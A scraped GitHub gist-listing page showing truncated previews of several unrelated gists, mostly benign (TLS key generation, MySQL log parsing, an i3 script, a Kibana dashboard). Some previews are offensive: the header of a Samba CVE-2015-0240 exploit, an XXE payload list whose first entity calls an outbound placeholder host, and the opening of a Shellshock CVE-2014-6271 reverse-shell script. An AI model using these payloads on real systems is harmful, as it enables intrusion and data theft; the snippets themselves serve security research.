kost

💭
I'm up to something
  • Diverto
  • Zagreb, Croatia
  • X @k0st
@worawit
worawit / cve-2015-0240_samba_exploit.py
Created April 10, 2015 14:48
Exploit for Samba vulnerability (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerability (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@denji
denji / golang-tls.md
Last active July 22, 2025 05:41 — forked from spikebike/client.go
Simple Golang HTTPS/TLS Examples
Generate private key (.key)
# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048

# Key considerations for algorithm "ECDSA" ≥ secp384r1
# List the supported ECDSA curves (openssl ecparam -list_curves)
@mjpowersjr
mjpowersjr / gist:740a9583e9ec8b49e0a3
Last active May 2, 2024 01:26
Parsing the MySQL slow query log via Logstash (the easy way?)

The MySQL slow query log is a difficult format to extract information from. After looking at various examples with mixed results, I realized that it's much easier to configure MySQL to write the slow query log to a table in CSV format!

From the MySQL documentation:

By default, the log tables use the CSV storage engine that writes data in comma-separated values format. For users who have access to the .CSV files that contain log table data, the files are easy to import into other programs such as spreadsheets that can process CSV input.

my.cnf

Note: don't forget to open up permissions on your slow query log CSV file so logstash can read it!

# enable slow query log
#!/usr/bin/env python
import i3
outputs = i3.get_outputs()
workspaces = i3.get_workspaces()
# figure out what is on, and what is currently on your screen.
workspace = list(filter(lambda s: s['focused']==True, workspaces))
output = list(filter(lambda s: s['active']==True, outputs))
@nderkach
nderkach / read_mitmproxy_dumpfile.py
Last active March 23, 2025 19:19
Read a mitmproxy dump file and generate a curl command
#!/usr/bin/env python
#
# Simple script showing how to read a mitmproxy dump file
#
### UPD: this feature is now available in mitmproxy: https://github.com/mitmproxy/mitmproxy/pull/619
from libmproxy import flow
import json, sys
@eyecatchup
eyecatchup / hammerhead-from-lrx21o-to-lrx22c.md
Last active November 1, 2023 08:35
A step-by-step guide how to manually flash the Android 5.0.1 (LRX22C) OTA-Update on a Nexus 5 with modified system (custom recovery/kernel, rooted, modified framework etc.).

Update: For those interested, here's the version for updating from Android 5.1.0 (LMY47D/LMY47I) to Android 5.1.1 (LMY48B):
https://gist.github.com/eyecatchup/dab5cf7977008e504213


  UPDATE `NEXUS 5` 
     SET `VERSION`='5.0.1', `BUILD`='LRX22C', `RECOVERY`='CUSTOM', `ROOTED`=1 
   WHERE `VERSION`='5.0' && `BUILD`='LRX21O' && `RECOVERY`='CUSTOM' && `ROOTED`=1 
         && `WANNA_KEEP_USERDATA`=1;
@staaldraad
staaldraad / XXE_payloads
Last active July 31, 2025 23:05
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@elijahpaul
elijahpaul / pfsense_kibana_dash_v1.json
Created October 12, 2014 15:58
pfSense firewall dashboard (Kibana)
{
"title": "PFSense Firewall",
"services": {
"query": {
"idQueue": [],
"list": {
"0": {
"query": "tags: \"PFSense\" AND action: \"pass\"",
"alias": "Passed",
"color": "#6ED0E0",
@chomy
chomy / httpclient.c
Created October 2, 2014 07:27
HTTP Client in C
/* Feature-test macro: must be spelled _GNU_SOURCE and defined before any system header */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <signal.h>
@infoslack
infoslack / cve-2014-6271.py
Last active April 5, 2019 14:45
CVE-2014-6271 cgi-bin reverse shell
# CVE-2014-6271 cgi-bin reverse shell
# Original: http://pastebin.com/raw.php?i=166f8Rjx
import httplib,urllib,sys
if (len(sys.argv)<3):
    print "Usage: %s <host> <vulnerable CGI>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0]
    exit(0)
conn = httplib.HTTPConnection(sys.argv[1])